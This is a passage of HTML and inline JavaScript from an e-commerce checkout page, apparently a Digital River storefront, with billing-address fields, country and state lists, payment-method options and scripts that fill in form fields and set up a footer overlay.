<input type="hidden" name="ORIG_VALUE_operation" value="update"/>
<input name="operation" value="update" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_mode" value="anonymous"/>
<input name="mode" value="anonymous" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_enforceValidShippingOption" value="false"/>
<input name="enforceValidShippingOption" value="false" type="hidden"/>
<div id="dr_billingContainer">
<fieldset id="dr_billing">
<legend>Billing Information</legend>
<h3>Billing Information</h3>
<div class="dr_formLine">
<label class="dr_label" for="billingName1">
<span class="dr_required">First Name:</span>
<span class="dr_reqFieldIndicator cart-redasterisk">*</span>
<span class="dr_error" required="billingName1">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_BILLINGname1" value=""/>
<input name="BILLINGname1" value="" id="billingName1" type="text"/>
</div>
<div class="dr_formLine">
<label class="dr_label" for="billingName2">
<span class="dr_required">Last Name:</span>
<span class="dr_reqFieldIndicator cart-redasterisk">*</span>
<span class="dr_error" required="billingName2">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_BILLINGname2" value=""/>
<input name="BILLINGname2" value="" id="billingName2" type="text"/>
</div>
<div class="dr_formLine">
<label class="dr_label" for="billingCompanyName">Company Name:
<br/>
</label>
<input type="hidden" name="ORIG_VALUE_BILLINGcompanyName" value=""/>
<input name="BILLINGcompanyName" value="" id="billingCompanyName" type="text"/>
</div>
<div class="dr_formLine">
<label class="dr_label" for="billingAddress1">
<span class="dr_required">Address:</span>
<span class="dr_reqFieldIndicator cart-redasterisk">*</span>
<span class="dr_error" required="billingAddress1">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_BILLINGline1" value=""/>
<input name="BILLINGline1" value="" id="billingAddress1" type="text"/>
</div>
<div class="dr_formLine">
<label class="dr_label" for="billingAddress2">Apartment/Suite:</label>
<input type="hidden" name="ORIG_VALUE_BILLINGline2" value=""/>
<input name="BILLINGline2" value="" id="billingAddress2" type="text"/>
</div>
<div class="dr_formLine">
<label class="dr_label" for="billingCity">
<span class="dr_required">City:</span>
<span class="dr_reqFieldIndicator cart-redasterisk">*</span>
<span class="dr_error" required="billingCity">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_BILLINGcity" value=""/>
<input name="BILLINGcity" value="" id="billingCity" type="text"/>
</div>
<div class="dr_formLine">
<label class="dr_label" for="billingState">
<span class="dr_required">State/Province:</span>
<span class="dr_reqFieldIndicator cart-redasterisk">*</span>
<span class="dr_error" validate="billingState" checkCountry="billingCountry">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_BILLINGstate" value=""/>
<select name="BILLINGstate" id="billingState">
<option value="" selected="selected">Select One</option>
<option value="" selected="selected">*Not Applicable</option>
<option value="AL">Alabama</option>
<option value="AK">Alaska</option>
<option value="AB">Alberta</option>
<option value="AS">American Samoa</option>
<option value="AZ">Arizona</option>
<option value="AR">Arkansas</option>
<option value="AA">Armed Forces America</option>
<option value="AE">Armed Forces Europe</option>
<option value="AP">Armed Forces Pacific</option>
<option value="BC">British Columbia</option>
<option value="CA">California</option>
<option value="CO">Colorado</option>
<option value="CT">Connecticut</option>
<option value="DE">Delaware</option>
<option value="DC">District Of Columbia</option>
<option value="FM">Federated States of Micronesia</option>
<option value="FL">Florida</option>
<option value="GA">Georgia</option>
<option value="GU">Guam</option>
<option value="HI">Hawaii</option>
<option value="ID">Idaho</option>
<option value="IL">Illinois</option>
<option value="IN">Indiana</option>
<option value="IA">Iowa</option>
<option value="KS">Kansas</option>
<option value="KY">Kentucky</option>
<option value="LA">Louisiana</option>
<option value="ME">Maine</option>
<option value="MB">Manitoba</option>
<option value="MH">Marshall Islands</option>
<option value="MD">Maryland</option>
<option value="MA">Massachusetts</option>
<option value="MI">Michigan</option>
<option value="MN">Minnesota</option>
<option value="MS">Mississippi</option>
<option value="MO">Missouri</option>
<option value="MT">Montana</option>
<option value="NE">Nebraska</option>
<option value="NV">Nevada</option>
<option value="NB">New Brunswick</option>
<option value="NL">Newfoundland and Labrador</option>
<option value="NH">New Hampshire</option>
<option value="NJ">New Jersey</option>
<option value="NM">New Mexico</option>
<option value="NY">New York</option>
<option value="NC">North Carolina</option>
<option value="ND">North Dakota</option>
<option value="MP">Northern Mariana Islands</option>
<option value="NT">Northwest Territories</option>
<option value="NS">Nova Scotia</option>
<option value="NU">Nunavut</option>
<option value="OH">Ohio</option>
<option value="OK">Oklahoma</option>
<option value="ON">Ontario</option>
<option value="OR">Oregon</option>
<option value="PW">Palau</option>
<option value="PA">Pennsylvania</option>
<option value="PE">Prince Edward Island</option>
<option value="PR">Puerto Rico</option>
<option value="QC">Quebec</option>
<option value="RI">Rhode Island</option>
<option value="SK">Saskatchewan</option>
<option value="SC">South Carolina</option>
<option value="SD">South Dakota</option>
<option value="TN">Tennessee</option>
<option value="TX">Texas</option>
<option value="UT">Utah</option>
<option value="VT">Vermont</option>
<option value="VA">Virginia</option>
<option value="VI">Virgin Islands</option>
<option value="WA">Washington</option>
<option value="WV">West Virginia</option>
<option value="WI">Wisconsin</option>
<option value="WY">Wyoming</option>
<option value="YT">Yukon</option>
</select>
</div>
<div class="dr_formLine">
<label class="dr_label" for="billingPostalCode">
<span class="dr_required">Zip/Postal Code:</span>
<span class="dr_reqFieldIndicator cart-redasterisk">*</span>
<span class="dr_error" required="billingPostalCode">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_BILLINGpostalCode" value=""/>
<input name="BILLINGpostalCode" value="" id="billingPostalCode" type="text"/>
</div>
<div class="dr_formLine">
<label class="dr_label" for="billingCountry">
<span class="dr_required">Country:</span>
<span class="dr_reqFieldIndicator cart-redasterisk">*</span>
<span class="dr_error" required="billingCountry">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_BILLINGcountry" value=""/>
<select name="BILLINGcountry" id="billingCountry">
<option value="" selected="selected">Select One</option>
<option value="AF">Afghanistan</option>
<option value="AL">Albania</option>
<option value="DZ">Algeria</option>
<option value="AS">American Samoa</option>
<option value="AD">Andorra</option>
<option value="AI">Anguilla</option>
<option value="AQ">Antarctica</option>
<option value="AG">Antigua and Barbuda</option>
<option value="AR">Argentina</option>
<option value="AM">Armenia</option>
<option value="AW">Aruba</option>
<option value="AU">Australia</option>
<option value="AT">Austria</option>
<option value="AZ">Azerbaidjan</option>
<option value="BS">Bahamas</option>
<option value="BH">Bahrain</option>
<option value="BD">Bangladesh</option>
<option value="BB">Barbados</option>
<option value="BY">Belarus</option>
<option value="BE">Belgium</option>
<option value="BZ">Belize</option>
<option value="BJ">Benin</option>
<option value="BM">Bermuda</option>
<option value="BT">Bhutan</option>
<option value="BO">Bolivia</option>
<option value="BA">Bosnia-Herzegovina</option>
<option value="BW">Botswana</option>
<option value="BV">Bouvet Island</option>
<option value="BR">Brazil</option>
<option value="IO">British Indian Ocean Territory</option>
<option value="BN">Brunei Darussalam</option>
<option value="BG">Bulgaria</option>
<option value="BF">Burkina Faso</option>
<option value="BI">Burundi</option>
<option value="KH">Cambodia</option>
<option value="CM">Cameroon</option>
<option value="CA">Canada</option>
<option value="CV">Cape Verde</option>
<option value="KY">Cayman Islands</option>
<option value="CF">Central African Republic</option>
<option value="TD">Chad</option>
<option value="CL">Chile</option>
<option value="CN">China</option>
<option value="CX">Christmas Island</option>
<option value="CC">Cocos (Keeling) Islands</option>
<option value="CO">Colombia</option>
<option value="KM">Comoros</option>
<option value="CG">Congo</option>
<option value="CD">Congo, The Democratic Republic Of The</option>
<option value="CK">Cook Islands</option>
<option value="CR">Costa Rica</option>
<option value="HR">Croatia</option>
<option value="CY">Cyprus</option>
<option value="CZ">Czech Republic</option>
<option value="DK">Denmark</option>
<option value="DJ">Djibouti</option>
<option value="DM">Dominica</option>
<option value="DO">Dominican Republic</option>
<option value="TL">EAST TIMOR</option>
<option value="EC">Ecuador</option>
<option value="EG">Egypt</option>
<option value="SV">El Salvador</option>
<option value="GQ">Equatorial Guinea</option>
<option value="ER">Eritrea</option>
<option value="EE">Estonia</option>
<option value="ET">Ethiopia</option>
<option value="FK">Falkland Islands</option>
<option value="FO">Faroe Islands</option>
<option value="FJ">Fiji</option>
<option value="FI">Finland</option>
<option value="FR">France</option>
<option value="GF">French Guiana</option>
<option value="TF">French Southern Territories</option>
<option value="GA">Gabon</option>
<option value="GM">Gambia</option>
<option value="GE">Georgia</option>
<option value="DE">Germany</option>
<option value="GH">Ghana</option>
<option value="GI">Gibraltar</option>
<option value="GB">Great Britain</option>
<option value="GR">Greece</option>
<option value="GL">Greenland</option>
<option value="GD">Grenada</option>
<option value="GP">Guadeloupe (French)</option>
<option value="GU">Guam (USA)</option>
<option value="GT">Guatemala</option>
<option value="GN">Guinea</option>
<option value="GW">Guinea Bissau</option>
<option value="GY">Guyana</option>
<option value="HT">Haiti</option>
<option value="HM">Heard and McDonald Islands</option>
<option value="HN">Honduras</option>
<option value="HK">Hong Kong</option>
<option value="HU">Hungary</option>
<option value="IS">Iceland</option>
<option value="IN">India</option>
<option value="ID">Indonesia</option>
<option value="IE">Ireland</option>
<option value="IL">Israel</option>
<option value="IT">Italy</option>
<option value="CI">Ivory Coast (Cote D'Ivoire)</option>
<option value="JM">Jamaica</option>
<option value="JP">Japan</option>
<option value="JO">Jordan</option>
<option value="KZ">Kazakhstan</option>
<option value="KE">Kenya</option>
<option value="KI">Kiribati</option>
<option value="KW">Kuwait</option>
<option value="KG">Kyrgyzstan</option>
<option value="LA">Laos</option>
<option value="LV">Latvia</option>
<option value="LB">Lebanon</option>
<option value="LS">Lesotho</option>
<option value="LR">Liberia</option>
<option value="LI">Liechtenstein</option>
<option value="LT">Lithuania</option>
<option value="LU">Luxembourg</option>
<option value="MO">Macau</option>
<option value="MK">Macedonia</option>
<option value="MG">Madagascar</option>
<option value="MW">Malawi</option>
<option value="MY">Malaysia</option>
<option value="MV">Maldives</option>
<option value="ML">Mali</option>
<option value="MT">Malta</option>
<option value="MH">Marshall Islands</option>
<option value="MQ">Martinique</option>
<option value="MR">Mauritania</option>
<option value="MU">Mauritius</option>
<option value="YT">Mayotte</option>
<option value="MX">Mexico</option>
<option value="FM">Micronesia, Federated States of</option>
<option value="MD">Moldavia, Republic of</option>
<option value="MC">Monaco</option>
<option value="MN">Mongolia</option>
<option value="MS">Montserrat</option>
<option value="MA">Morocco</option>
<option value="MZ">Mozambique</option>
<option value="MM">Myanmar</option>
<option value="NA">Namibia</option>
<option value="NR">Nauru</option>
<option value="NP">Nepal</option>
<option value="NL">Netherlands</option>
<option value="AN">Netherlands Antilles</option>
<option value="NC">New Caledonia (French)</option>
<option value="NZ">New Zealand</option>
<option value="NI">Nicaragua</option>
<option value="NE">Niger</option>
<option value="NG">Nigeria</option>
<option value="NU">Niue</option>
<option value="NF">Norfolk Island</option>
<option value="MP">Northern Mariana Islands</option>
<option value="NO">Norway</option>
<option value="OM">Oman</option>
<option value="PK">Pakistan</option>
<option value="PW">Palau</option>
<option value="PA">Panama</option>
<option value="PG">Papua New Guinea</option>
<option value="PY">Paraguay</option>
<option value="PE">Peru</option>
<option value="PH">Philippines</option>
<option value="PN">Pitcairn Island</option>
<option value="PL">Poland</option>
<option value="PF">Polynesia (French)</option>
<option value="PT">Portugal</option>
<option value="PR">Puerto Rico</option>
<option value="QA">Qatar</option>
<option value="RE">Reunion (French)</option>
<option value="RO">Romania</option>
<option value="RU">Russian Federation</option>
<option value="GS">S. Georgia and S. Sandwich Isls.</option>
<option value="SH">Saint Helena</option>
<option value="KN">Saint Kitts and Nevis Anguilla</option>
<option value="LC">Saint Lucia</option>
<option value="PM">Saint Pierre and Miquelon</option>
<option value="ST">Saint Tome and Principe</option>
<option value="VC">Saint Vincent and Grenadines</option>
<option value="WS">Samoa</option>
<option value="SM">San Marino</option>
<option value="SA">Saudi Arabia</option>
<option value="SN">Senegal</option>
<option value="SC">Seychelles</option>
<option value="SL">Sierra Leone</option>
<option value="SG">Singapore</option>
<option value="SK">Slovak Republic</option>
<option value="SI">Slovenia</option>
<option value="SB">Solomon Islands</option>
<option value="ZA">South Africa</option>
<option value="KR">South Korea</option>
<option value="ES">Spain</option>
<option value="LK">Sri Lanka</option>
<option value="SR">Suriname</option>
<option value="SJ">Svalbard and Jan Mayen Islands</option>
<option value="SZ">Swaziland</option>
<option value="SE">Sweden</option>
<option value="CH">Switzerland</option>
<option value="TW">Taiwan</option>
<option value="TJ">Tajikistan</option>
<option value="TZ">Tanzania</option>
<option value="TH">Thailand</option>
<option value="TG">Togo</option>
<option value="TK">Tokelau</option>
<option value="TO">Tonga</option>
<option value="TT">Trinidad and Tobago</option>
<option value="TN">Tunisia</option>
<option value="TR">Turkey</option>
<option value="TM">Turkmenistan</option>
<option value="TC">Turks and Caicos Islands</option>
<option value="TV">Tuvalu</option>
<option value="UG">Uganda</option>
<option value="UA">Ukraine</option>
<option value="AE">United Arab Emirates</option>
<option value="US">United States</option>
<option value="UM">United States Minor Outlying Islands</option>
<option value="UY">Uruguay</option>
<option value="UZ">Uzbekistan</option>
<option value="VU">Vanuatu</option>
<option value="VA">Vatican City State</option>
<option value="VE">Venezuela</option>
<option value="VN">Vietnam</option>
<option value="VG">Virgin Islands (British)</option>
<option value="VI">Virgin Islands (USA)</option>
<option value="WF">Wallis and Futuna Islands</option>
<option value="EH">Western Sahara</option>
<option value="YE">Yemen</option>
<option value="ZM">Zambia</option>
</select>
</div>
<div class="dr_formLine">
<label class="dr_label" for="billingPhoneNumber">
<span class="dr_required">Phone Number:</span>
<span class="dr_reqFieldIndicator cart-redasterisk">*</span>
<span class="dr_error" required="billingPhoneNumber">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_BILLINGphoneNumber" value=""/>
<input name="BILLINGphoneNumber" value="" id="billingPhoneNumber" type="text"/>
</div>
<div class="dr_formLine">
<label class="dr_label" for="email">
<span class="dr_required">Email Address:</span>
<span class="dr_reqFieldIndicator cart-redasterisk">*</span>
<span class="dr_error" requiredEmail="email">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_EMAILemail" value=""/>
<input name="EMAILemail" value="" id="email" type="text"/>
</div>
</fieldset>
</div>
<div id="dr_optInContainer">
<fieldset id="dr_optIn">
<legend>Additional Information</legend>
<h3>Additional Information</h3>
<div id="dr_optInEmail">
<div class="dr_formLine">
<label class="dr_label" for="optIn">We'd like to keep you informed via email about product updates, upgrades, special offers and pricing. If you do not wish to be contacted via email, please ensure that the box is not checked.</label><input type="hidden" name="ORIG_VALUE_optIn" value="on"/><input type="checkbox" name="optIn" value="on" checked="checked"/></div>
</div>
</fieldset>
</div>
<div id="dr_paymentContainer">
<fieldset id="dr_payment">
<legend>Payment Information</legend>
<h3>Payment Information</h3>
<span class="dr_error">
<!--..-->
</span>
<div class="dr_paymentMethodBlock" id="dr_creditCard">
<input type="hidden" name="ORIG_VALUE_paymentMethodID$$1001" value="-1"/>
<input name="paymentMethodID$$1001" value="-1" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_name$$1001" value="CreditCardMethod"/>
<input name="name$$1001" value="CreditCardMethod" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_paymentMethodFee$$1001" value=""/>
<input name="paymentMethodFee$$1001" value="" type="hidden"/>
<div class="dr_formLine" id="dr_creditCardRadioSelect">
<label class="dr_label_paymentMethodName" for="CreditCardMethod">
<input type="hidden" name="ORIG_VALUE_paymentMethodID" value="-1"/>
<input type="radio" name="paymentMethodID" value="-1" id="CreditCardMethod" checked="checked"/>
<strong class="dr_paymentOptionItem">Credit Card</strong>
</label>
<span class="dr_expandDetails">(<a href="#" class="dr_expandDetails" data-expand-section="dr_ExpandPaymentDetailsCreditCardMethod">details</a>)</span>
<p>
<img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/cc_mc_en_US.gif" alt="We Accept all Major Credit Cards"/>
</p>
</div>
<div class="dr_ExpandPaymentDetailsSection" id="dr_ExpandPaymentDetailsCreditCardMethod">
<p>Please enter your credit card as a continuous string of numbers without spaces or dashes.<br />The security of your credit card information is important to us. We use Secure Socket Layer (SSL) technology to protect the security of your credit card information.</p>
</div>
<div id="dr_creditCardSection">
<p>
<span class="dr_error">
<!--..-->
</span>
</p>
<div class="dr_formLine" id="dr_ccNumEntry">
<label class="dr_label" for="ccNum">Credit Card Number:
<span class="dr_error" validate="ccNum" checkCcNum="CreditCardMethod">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_cardNumber" value=""/>
<input name="cardNumber" value="" id="ccNum" type="text"/>
</div>
<div class="dr_formLine" id="dr_expDateSelect">
<label class="dr_label" for="expDate">Expiration Date:
<span class="dr_error" validate="ccMonth" expYear="ccYear" checkExpDate="CreditCardMethod">
<!--..-->
</span>
<span class="dr_error" validate="ccYear" expMonth="ccMonth" checkExpDate="CreditCardMethod">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_cardExpirationMonth" value=""/>
<select name="cardExpirationMonth" id="ccMonth">
<option value="" selected="selected">Select One</option>
<option value="1">January</option>
<option value="2">February</option>
<option value="3">March</option>
<option value="4">April</option>
<option value="5">May</option>
<option value="6">June</option>
<option value="7">July</option>
<option value="8">August</option>
<option value="9">September</option>
<option value="10">October</option>
<option value="11">November</option>
<option value="12">December</option>
</select> ../<input type="hidden" name="ORIG_VALUE_cardExpirationYear" value=""/>
<select name="cardExpirationYear" id="ccYear">
<option value="" selected="selected">Select One</option>
<option value="2011">2011</option>
<option value="2012">2012</option>
<option value="2013">2013</option>
<option value="2014">2014</option>
<option value="2015">2015</option>
<option value="2016">2016</option>
<option value="2017">2017</option>
<option value="2018">2018</option>
<option value="2019">2019</option>
<option value="2020">2020</option>
<option value="2021">2021</option>
</select>
</div>
<div class="dr_formLine" id="dr_ccSecurityCodeEntry">
<label class="dr_label" for="ccCode">Card Security Code:
<span class="dr_error">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_cardSecurityCode" value=""/>
<input name="cardSecurityCode" value="" id="cardSecurityCode" size="4" type="text"/>Click <a href="/store/para/en_US/DisplayPage/id.CardSecurityCodeInstructionsPage" onclick="popUp(this.href,'CardSecurityCode',550,550);return false;" target="_blank">here</a> for more information.</div>
<input type="hidden" name="ORIG_VALUE_saveMyCcEnabled" value="false"/>
<input name="saveMyCcEnabled" value="false" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_saveMyCc$$1001" value="off"/>
<input name="saveMyCc$$1001" value="off" type="hidden"/>
</div>
</div>
<div class="dr_paymentMethodBlock" id="dr_Check">
<input type="hidden" name="ORIG_VALUE_paymentMethodID$$1002" value="38"/>
<input name="paymentMethodID$$1002" value="38" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_name$$1002" value="Check"/>
<input name="name$$1002" value="Check" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_paymentMethodFee$$1002" value=""/>
<input name="paymentMethodFee$$1002" value="" type="hidden"/>
<div class="dr_formLine" id="dr_CheckRadioSelect">
<label class="dr_label_paymentMethodName" for="Check">
<input type="radio" name="paymentMethodID" id="Check" value="38"/>
<strong class="dr_paymentOptionItem">Check</strong>
</label>
<span class="dr_expandDetails">(<a href="#" class="dr_expandDetails" data-expand-section="dr_ExpandPaymentDetailsCheck">details</a>)</span>
</div>
<div class="dr_ExpandPaymentDetailsSection" id="dr_ExpandPaymentDetailsCheck">Follow the instructions on the "order completed" page to pay by check. Your order will be approved 3 days after we receive your payment.</div>
</div>
<div class="dr_paymentMethodBlock" id="dr_PayPalExpress">
<input type="hidden" name="ORIG_VALUE_paymentMethodID$$1003" value="190000"/>
<input name="paymentMethodID$$1003" value="190000" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_name$$1003" value="PayPalExpress"/>
<input name="name$$1003" value="PayPalExpress" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_paymentMethodFee$$1003" value=""/>
<input name="paymentMethodFee$$1003" value="" type="hidden"/>
<div class="dr_formLine" id="dr_PayPalExpressRadioSelect">
<label class="dr_label_paymentMethodName" for="PayPalExpress">
<input type="radio" name="paymentMethodID" id="PayPalExpress" value="190000"/>
<strong class="dr_paymentOptionItem">PayPal</strong>
</label>
<span class="dr_expandDetails">(<a href="#" class="dr_expandDetails" data-expand-section="dr_ExpandPaymentDetailsPayPalExpress">details</a>)</span>
</div>
<div class="dr_ExpandPaymentDetailsSection" id="dr_ExpandPaymentDetailsPayPalExpress"><img border="0" id="dr_paypalExpressImage" src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/cc_paypalExp_logo.gif"/>Make a payment from your new or existing PayPal account. Be sure to use your PayPal login as your order email address.</div>
</div>
<div class="dr_paymentMethodBlock" id="dr_WireTransfer">
<input type="hidden" name="ORIG_VALUE_paymentMethodID$$1004" value="37"/>
<input name="paymentMethodID$$1004" value="37" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_name$$1004" value="WireTransfer"/>
<input name="name$$1004" value="WireTransfer" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_paymentMethodFee$$1004" value=""/>
<input name="paymentMethodFee$$1004" value="" type="hidden"/>
<div class="dr_formLine" id="dr_WireTransferRadioSelect">
<label class="dr_label_paymentMethodName" for="WireTransfer">
<input type="radio" name="paymentMethodID" id="WireTransfer" value="37"/>
<strong class="dr_paymentOptionItem">Wire Transfer</strong>
</label>
<span class="dr_expandDetails">(<a href="#" class="dr_expandDetails" data-expand-section="dr_ExpandPaymentDetailsWireTransfer">details</a>)</span>
</div>
<div class="dr_ExpandPaymentDetailsSection" id="dr_ExpandPaymentDetailsWireTransfer">Follow the instructions on the "order completed" page to wire the money electronically from bank to bank. This process will take approximately 4-5 days. After we receive confirmation that our bank has received your funds, your order will be sent within the next two days.</div>
</div><script language="Javascript">function PaymentEntry(name, ccNum, expMonth, expYear, billingID){this.paymentNickName = name;this.cardNumber = ccNum;this.cardExpirationMonth = expMonth;this.cardExpirationYear = expYear;this.paymentOptionID = billingID;}var paymentList = new Array();function onPaymentChange(el, prefix){var idx = el.selectedIndex - 1;if (idx > -1) {var paymentEntry = paymentList[idx];setPaymentValues(prefix, paymentEntry);} else {var selectedValue = el.options[el.selectedIndex].value;if (selectedValue == 'NEW') {document.getElementById('billingNickDiv').style.display = 'block';document.getElementById(prefix + 'Num').value = '';document.getElementById(prefix + 'NickName').value = '';document.getElementById(prefix + 'Month').value = '';document.getElementById(prefix + 'Year').value = '';} else if (selectedValue == 'FROM_REQ') {setPaymentValues(prefix, paymentAddress)}}}function setPaymentValues(prefix, PaymentEntry){document.getElementById(prefix + 'Method').value = PaymentEntry.paymentOptionID;document.getElementById(prefix + 'Num').value = PaymentEntry.cardNumber;document.getElementById(prefix + 'NickName').value = '';document.getElementById('billingNickDiv').style.display = 'none';document.getElementById(prefix + 'Month').value = PaymentEntry.cardExpirationMonth;document.getElementById(prefix + 'Year').value = PaymentEntry.cardExpirationYear;}</script></fieldset>
</div>
<input id="checkoutButton" type="image" class="dr_button" onClick="q=false" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/button_continue_v2.gif"/><script language="Javascript">function AddressEntry(name1, name2, companyName, line1, line2, city, state, postalCode, country, phoneNumber, phoneNumber2, faxPhone){this.name1 = name1;this.name2 = name2;this.companyName = companyName;this.line1 = line1;this.line2 = line2;this.city = city;this.state = state;this.postalCode = postalCode;this.country = country;this.phoneNumber = phoneNumber;this.phoneNumber2 = phoneNumber2;this.faxPhone = faxPhone;}var shipToAddress = new AddressEntry('','','','','','','','','','','','');var addressList = new Array();function onAddressChange(el, prefix){var idx = el.selectedIndex - 2;if (idx > -1) {var addressEntry = addressList[idx];setAddressValues(prefix, addressEntry);} else {var selectedValue = el.options[el.selectedIndex].value;if (selectedValue == 'NEW') {document.getElementById(prefix + 'Name1').value = '';document.getElementById(prefix + 'Name2').value = '';document.getElementById(prefix + 'CompanyName').value = '';document.getElementById(prefix + 'Address1').value = '';document.getElementById(prefix + 'Address2').value = '';document.getElementById(prefix + 'City').value = '';document.getElementById(prefix + 'State').value = '';document.getElementById(prefix + 'PostalCode').value = '';document.getElementById(prefix + 'Country').value = '';document.getElementById(prefix + 'PhoneNumber').value = '';if (document.getElementById(prefix + 'PhoneNumber2')) {document.getElementById(prefix + 'PhoneNumber2').value = '';}if (document.getElementById(prefix + 'FaxPhone')) {document.getElementById(prefix + 'FaxPhone').value = '';}} else if (selectedValue == 'FROM_REQ') {if (prefix == 'billing') {setAddressValues(prefix, billToAddress);} else if (prefix == 'shipping') {setAddressValues(prefix, shipToAddress);}}}}function setAddressValues(prefix, addressEntry){document.getElementById(prefix + 'Name1').value = addressEntry.name1;document.getElementById(prefix + 'Name2').value = addressEntry.name2;document.getElementById(prefix + 'CompanyName').value = addressEntry.companyName;document.getElementById(prefix + 'Address1').value = addressEntry.line1;document.getElementById(prefix + 'Address2').value = addressEntry.line2;document.getElementById(prefix + 'City').value = addressEntry.city;document.getElementById(prefix + 'State').value = addressEntry.state;document.getElementById(prefix + 'PostalCode').value = addressEntry.postalCode;document.getElementById(prefix + 'Country').value = addressEntry.country;document.getElementById(prefix + 'PhoneNumber').value = addressEntry.phoneNumber;if (document.getElementById(prefix + 'PhoneNumber2')) {document.getElementById(prefix + 'PhoneNumber2').value = addressEntry.phoneNumber2;}if (document.getElementById(prefix + 'FaxPhone')) {document.getElementById(prefix + 'FaxPhone').value = addressEntry.faxPhone;}}</script>
<div id="dr_TCFooter"><div id="dr_overlay_wrapper" style="position:absolute;width:687px;height:383px;display:none;"><table border="0" cellspacing="0" cellpadding="0" id="dr_overlay_table"><tr><td class="dr_overlay_table_top_left">&nbsp;</td><td class="dr_overlay_table_top_middle">&nbsp;</td><td class="dr_overlay_table_top_right">&nbsp;</td></tr><tr><td class="dr_overlay_table_left">&nbsp;</td><td class="dr_overlay_table_middle"><div id="dr_overlay_header"><div id="dr_overlay_close_window"><a href="#" title="Close Window"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/close_en_US.gif" align="right" alt="Close Window" border="0"/></a></div><div id="dr_overlay_logo"><a href="/store/defaults/en_US&id=DRAboutDigitalRiverPage" target="DrOverlayIframe"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/images/dr_logo_0209.gif" width="115" height="27" alt="Digital River" border="0"></a></div><div class="dr_overlay_clearit"><!-- --></div><div id="dr_overlay_nav"><ul id="dr_overlay_tabs"><li class="dr_overlay_about_digital_river"><a id="ContactInformationLink" href="/store/defaults/en_US/DisplayDRAboutDigitalRiverPage" target="DrOverlayIframe">About Digital River, Inc.</a></li><li class="dr_overlay_privacy_policy"><a id="PrivacyPolicyLink" href="/store/defaults/en_US/DisplayDRPrivacyPolicyPage" target="DrOverlayIframe">Privacy Policy</a></li><li class="dr_overlay_terms_and_conditions"><a id="TermsAndConditionsLink" href="/store/defaults/en_US/DisplayDRTermsAndConditionsPage" target="DrOverlayIframe">Terms of Sale</a></li><li class="dr_overlay_print"><a href="#"><img border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/icon_printer.gif" alt="Print"/></a></li></ul><!-- /#dr_overlay_tabs --></div><div class="dr_overlay_clearit"><!-- --></div></div><!-- /#dr_overlay_header --><iframe name="DrOverlayIframe" src="javascript:false" width="665" height="300" scrolling="auto" frameborder="0" marginheight="0" marginwidth="0"></iframe></td><td class="dr_overlay_table_right">&nbsp;</td></tr><tr><td class="dr_overlay_table_bottom_left">&nbsp;</td><td class="dr_overlay_table_bottom_middle">&nbsp;</td><td class="dr_overlay_table_bottom_right">&nbsp;</td></tr></table></div><!-- /#dr_overlay_wrapper --><script type="text/javascript">if (!window.jQuery) {document.writeln('<scr'+'ipt type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.3.2.min.js"></scr'+'ipt>');}</script><script type="text/javascript">(function($){$(window).load(function(){if ($.boxModel || ($.support && $.support.boxModel)) {$('head').append('<link rel="stylesheet" href="//drh2.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.base.css" type="text/css"/>');var msie = navigator.userAgent.match(/MSIE (\d+)/);var ie6 = false;var dataOK = true;if (msie) {var ver = parseInt(msie[1]);if (ver < 8) {dataOK = false;if (ver < 7) {ie6 = true;$('head').append('<link rel="stylesheet" href="//drh1.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.IE6.css" type="text/css"/>');}else {$('head').append('<link rel="stylesheet" href="//drh2.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.IE7.css" type="text/css"/>');}}}else if (/Firefox\/3\.5/.test(navigator.userAgent)) {dataOK = false;}if (dataOK) {$('head').append('<link rel="stylesheet" href="//drh1.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.data.css" type="text/css"/>');}var overlaySetup = function(){var footerLinkSelector = 'a.dr_aboutDigitalRiver,a.dr_privacyPolicy,a.dr_termsAndConditions';$(footerLinkSelector).removeAttr('onclick');$('#dr_overlay_wrapper').overlay({fixed: !ie6,modal: {css: {backgroundColor: '#FFF'}},showSelector: footerLinkSelector,hideSelector: '#dr_overlay_close_window > a[href="#"]',onShow: function(bgOverlay, footerLink){var iframeOverlay = this;$(bgOverlay).fadeIn('normal', function(){if (ie6) {self.scrollTo(0, 0);}$(iframeOverlay).slideDown('slow');});$('iframe', this).one('load', function(){$(this).css('visibility', 'visible');});parent.frames[footerLink.target].location.replace(footerLink.href);return false;},onHide: function(bgOverlay){$(this).hide();$(bgOverlay).fadeOut('normal');return false;}}).find('li.dr_overlay_print > a[href="#"]').click(function(){if (window['DrOverlayIframe']) 